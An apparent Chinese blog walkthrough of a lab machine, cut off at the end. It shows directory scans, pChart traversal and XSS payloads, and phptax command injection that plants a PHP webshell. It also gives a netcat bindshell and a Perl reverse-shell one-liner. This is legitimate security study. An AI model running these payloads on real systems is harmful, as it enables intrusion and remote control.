_ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\nOutput File: \/home\/kali\/reports\/http_192.168.244.144\/__24-01-29_02-01-23.txt\nTarget: http:\/\/192.168.244.144\/\n\n[02:01:23] Starting: \n[02:02:03] 500 -  535B  - \/cgi-bin\/printenv                                  \n[02:02:04] 500 -  535B  - \/cgi-bin\/test-cgi                                  \n\nTask Completed<\/code><\/pre>\n<p>\u4ee5\u9632\u4e07\u4e00\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>dirb<\/code>\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-shell\">dirb http:\/\/192.168.244.144\/\n# -----------------\n# DIRB v2.22    \n# By The Dark Raver\n# -----------------\n# START_TIME: Mon Jan 29 02:07:43 2024\n# URL_BASE: http:\/\/192.168.244.144\/\n# WORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\n# -----------------\n# GENERATED WORDS: 4612                                                          \n# ---- Scanning URL: http:\/\/192.168.244.144\/ ----\n# + http:\/\/192.168.244.144\/cgi-bin\/ (CODE:403|SIZE:210)                                       \n# + http:\/\/192.168.244.144\/index.html (CODE:200|SIZE:152)                                                                     \n# -----------------\n# END_TIME: Mon Jan 29 02:08:09 2024\n# DOWNLOADED: 4612 - FOUND: 2<\/code><\/pre>\n<h2>\u5bfb\u627e\u6f0f\u6d1e<\/h2>\n<p>\u521a\u521a\u5728\u6e90\u4ee3\u7801\u91cc\u627e\u5230\u4e86\u4e00\u4e2a\u914d\u7f6e\u7684\u7248\u672c\u53f7\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217169.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217169.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129160256578\" \/><\/div><\/p>\n<p>\u6b63\u597d\u7248\u672c\u548c\u6211\u4eec\u7684\u7248\u672c\u4e00\u81f4\uff0c\u6211\u4eec\u770b\u4e00\u4e0b\u6f0f\u6d1e\u662f\u5565\u6837\u7684\uff1a<\/p>\n<pre><code class=\"language-text\"># Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS\n# Date: 2014-01-24\n# Exploit Author: Balazs Makany\n# Vendor Homepage: www.pchart.net\n# Software Link: www.pchart.net\/download\n# Google Dork: intitle:&quot;pChart 2.x - examples&quot; intext:&quot;2.1.3&quot;\n# Version: 2.1.3\n# Tested on: N\/A (Web Application. 
Tested on FreeBSD and Apache)\n# CVE : N\/A\n\n[0] Summary:\nPHP library pChart 2.1.3 (and possibly previous versions) by default\ncontains an examples folder, where the application is vulnerable to\nDirectory Traversal and Cross-Site Scripting (XSS).\nIt is plausible that custom built production code contains similar\nproblems if the usage of the library was copied from the examples.\nThe exploit author engaged the vendor before publicly disclosing the\nvulnerability and consequently the vendor released an official fix\nbefore the vulnerability was published.\n\n[1] Directory Traversal:\n&quot;hxxp:\/\/localhost\/examples\/index.php?Action=View&amp;Script=%2f..%2f..%2fetc\/passwd&quot;\nThe traversal is executed with the web server&#039;s privilege and leads to\nsensitive file disclosure (passwd, siteconf.inc.php or similar),\naccess to source codes, hardcoded passwords or other high impact\nconsequences, depending on the web server&#039;s configuration.\nThis problem may exists in the production code if the example code was\ncopied into the production environment.\n\nDirectory Traversal remediation:\n1) Update to the latest version of the software.\n2) Remove public access to the examples folder where applicable.\n3) Use a Web Application Firewall or similar technology to filter\nmalicious input attempts.\n\n[2] Cross-Site Scripting (XSS):\n&quot;hxxp:\/\/localhost\/examples\/sandbox\/script\/session.php?&lt;script&gt;alert(&#039;XSS&#039;)&lt;\/script&gt;\nThis file uses multiple variables throughout the session, and most of\nthem are vulnerable to XSS attacks. Certain parameters are persistent\nthroughout the session and therefore persists until the user session\nis active. 
The parameters are unfiltered.\n\nCross-Site Scripting remediation:\n1) Update to the latest version of the software.\n2) Remove public access to the examples folder where applicable.\n3) Use a Web Application Firewall or similar technology to filter\nmalicious input attempts.\n\n[3] Disclosure timeline:\n2014 January 16 - Vulnerability confirmed, vendor contacted\n2014 January 17 - Vendor replied, responsible disclosure was orchestrated\n2014 January 24 - Vendor was inquired about progress, vendor replied\nand noted that the official patch is released.<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528(\u672a\u5229\u7528\u6210\u529f)<\/h2>\n<p>\u53ef\u4ee5\u770b\u5230\u662f\u4e00\u4e2a\u76ee\u5f55\u904d\u5386\/\u6587\u4ef6\u6cc4\u9732\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\u4e00\u4e0b\uff0c\u4f46\u662f\u53d1\u73b0\u65e0\u6cd5\u76f4\u63a5\u5229\u7528\uff0c\u6ca1\u6709\u53d1\u73b0php\u6587\u4ef6\uff0c\u91cd\u65b0\u56de\u987e\u4e00\u4e0b\uff0c\u53ef\u4ee5\u770b\u5230\u4e4b\u524d\u7684<code>pchart<\/code>\u6709\u4e2a\u76ee\u5f55\uff0c\u641c\u7d22\u4e00\u4e0b\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8bbf\u95ee\u76f8\u5173\u76ee\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217170.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217170.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129161058040\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u7adf\u7136\u53ef\u4ee5\u8fdb\u884c\u8bbf\u95ee\uff0c\u723d\u6b7b\u4e86\uff01\u627e\u4e00\u4e0bphp\u6587\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217171.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217171.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129161324139\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6784\u9020payload\uff1a<\/p>\n<pre><code class=\"language-css\">http:\/\/192.168.244.144\/pChart2.1.3\/examples\/sandbox\/script\/session.php?%3Cscript%3Ealert(%27XSS%27)%3C\/script%3E<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217172.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217172.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" 
\/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u8fd9\u4e2a\u6f0f\u6d1e\u662f\u53ef\u4ee5\u8fdb\u884c\u5229\u7528\u7684\uff0c\u5c1d\u8bd5\u8bfb\u53d6\u76f8\u5173\u76ee\u5f55\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-css\">http:\/\/192.168.244.144\/pChart2.1.3\/examples\/index.php?Action=View&amp;Script=%2f..%2f..%2fetc\/passwd<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217173.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217173.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129161654877\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u7cfb\u7edf\u7248\u672c\u4e3a<code>FreeBSD 9.0<\/code>\uff0c\u5c1d\u8bd5\u641c\u7d22\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217174.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217174.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129161927669\" 
\/><\/div><\/p>\n<p>\u627e\u5230\u4e24\u4e2a\u6743\u9650\u63d0\u5347\u7684\u6f0f\u6d1e\uff0c\u770b\u6765\u5f97\u4ece\u522b\u7684\u5730\u65b9\u7740\u624b\u5148\u83b7\u53d6\u4e00\u4e2a\u666e\u901a\u7528\u6237\u3002<\/p>\n<p>\u67e5\u770b\u4e00\u4e0bApache\u670d\u52a1\u5668\u76f8\u5173\u914d\u7f6e\u6587\u4ef6\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u62ff\u5230\u654f\u611f\u6570\u636e\u3002\u641c\u7d22\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217175.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217175.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129162501746\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217176.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217176.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129162729726\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217177.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217177.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129163101271\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u8fdb\u884c\u67e5\u770b\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.244.144\/pChart2.1.3\/examples\/index.php?Action=View&amp;Script=%2f..%2f..%2fusr\/local\/etc\/apache22\/httpd.conf<\/code><\/pre>\n<p>\u53ef\u770b\u5230\u4e4b\u524d\u6ca1\u6709\u626b\u6210\u529f\u4e5f\u662f\u5f88\u6b63\u5e38\u7684\uff0capache\u914d\u7f6e\u4e86\u62d2\u7edd\u8fde\u63a5\u4e86\uff0c\u6211\u4eec\u67e5\u770b\u4ee5\u540e\u53d1\u73b0apache\u670d\u52a1\u5668\u5bf9\u4e8e\u8bbf\u95ee\u8bf7\u6c42\u5934\u6709\u8981\u6c42\uff0c\u5fc5\u987b\u4e3a<code>8080\u7aef\u53e3\u5141\u8bb8\u7684User-Agent\u4e3a\uff1aMozilla\/4.0 Mozilla4_browser<\/code>\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217178.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217178.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129171645499\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f7f\u7528\u63d2\u4ef6\u4fee\u6539\u8bf7\u6c42\u5934\u5c1d\u8bd5\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n<p>\u8fd9\u91cc\u6211\u4f7f\u7528\u7684\u662f\uff1a<code>HackBar V2 by chewbaka<\/code>\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217179.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217179.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129164409226\" \/><\/div><\/p>\n<p>\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217180.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217180.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20240129164600866\" \/><\/div><\/p>\n<p>\u5230\u5904\u70b9\u4e00\u4e0b\uff0c\u6ca1\u6709\u5565\u6536\u83b7\uff0c\u641c\u4e00\u4e0b\u8fd9\u662f\u4e2a\u5565\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217181.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217181.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129172340948\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u597d\u5bb6\u4f19\uff0c\u8fd9\u53ef\u4e0d\u662f\u6211\u60f3\u641c\u5230\u7684\u55f7\uff0c\u6211\u4eec\u76f4\u63a5\u5229\u7528\u4e00\u4e0b\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217182.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217182.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129172744914\" \/><\/div><\/p>\n<pre><code class=\"language-shell\">-----------------------------------------------------\nphptax 0.8 &lt;= Remote Code Execution 
Vulnerability\n-----------------------------------------------------\nDiscovered by: Jean Pascal Pereira &lt;pereira@secbiz.de&gt;\nVendor information:\n&quot;PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.\nThe program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot.&quot;\nVendor URI: http:\/\/sourceforge.net\/projects\/phptax\/\n----------------------------------------------------\nRisk-level: High\nThe application is prone to a remote code execution vulnerability.\n----------------------------------------------------\ndrawimage.php, line 63:\ninclude (&quot;.\/files\/$_GET[pfilez]&quot;);\n\/\/ makes a png image\n$pfilef=str_replace(&quot;.tob&quot;,&quot;.png&quot;,$_GET[pfilez]);\n$pfilep=str_replace(&quot;.tob&quot;,&quot;.pdf&quot;,$_GET[pfilez]);\nHeader(&quot;Content-type: image\/png&quot;);\nif ($_GET[pdf] == &quot;&quot;) Imagepng($image);\nif ($_GET[pdf] == &quot;make&quot;) Imagepng($image,&quot;.\/data\/pdf\/$pfilef&quot;);\nif ($_GET[pdf] == &quot;make&quot;) exec(&quot;convert .\/data\/pdf\/$pfilef .\/data\/pdf\/$pfilep&quot;);\n----------------------------------------------------\nExploit \/ Proof of Concept:\nBindshell on port 23235 using netcat:\nhttp:\/\/localhost\/phptax\/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20\/bin\/bash;&pdf=make\n** Exploit-DB Verified:**\nhttp:\/\/localhost\/phptax\/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20\/bin\/bash;&pdf=make\n----------------------------------------------------\nSolution:\nDo some input validation.\n----------------------------------------------------    <\/code><\/pre>\n<p>\u5c1d\u8bd5\u5229\u7528\uff0c\u5c1d\u8bd5\u4f20\u4e00\u4e2a\u4e00\u53e5\u8bdd\u6728\u9a6c\u4e0a\u53bb\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.244.144:8080\/phptax\/index.php?pfilez=xxx;echo%20%22%3C%3Fphp%20system(\\$_GET[&#039;hack&#039;]); 
%3F%3E%22%20&gt;%20shell.php;&amp;pdf=make\n# http:\/\/192.168.244.144:8080\/phptax\/index.php?pfilez=xxx;echo &quot;&lt;?php system(\\$_GET[&#039;hack&#039;]); ?&gt;&quot; &gt; shell.php;&amp;pdf=make<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217183.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217183.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129182939902\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fde\u63a5\uff0c\u5931\u8d25\uff0c\u67e5\u770b<a href=\"https:\/\/blog.csdn.net\/qq_32261191\/article\/details\/118895081\">\u5927\u4f6c\u7684blog<\/a>\uff0c\u53d1\u73b0\u662f\u8981\u901a\u8fc7perl\u811a\u672c\u6765\u53cd\u5f39shell\uff0c\u8fd9\u4e00\u5757\u8fd8\u662f\u4e0d\u592a\u4f1a\uff0c\u56de\u5934\u5355\u72ec\u5b66\u4e60\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-perl\"># Server\n\/phptax\/drawimage.php?pfilez=xxx;perl -e &#039;use Socket;$i=&quot;192.168.244.144&quot;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;\/bin\/sh -i&quot;);};&#039;&amp;pdf=make\n# Client\nnc -lvp 1234<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217184.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202401292217184.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240129184847428\" style=\"zoom: 50%;\" 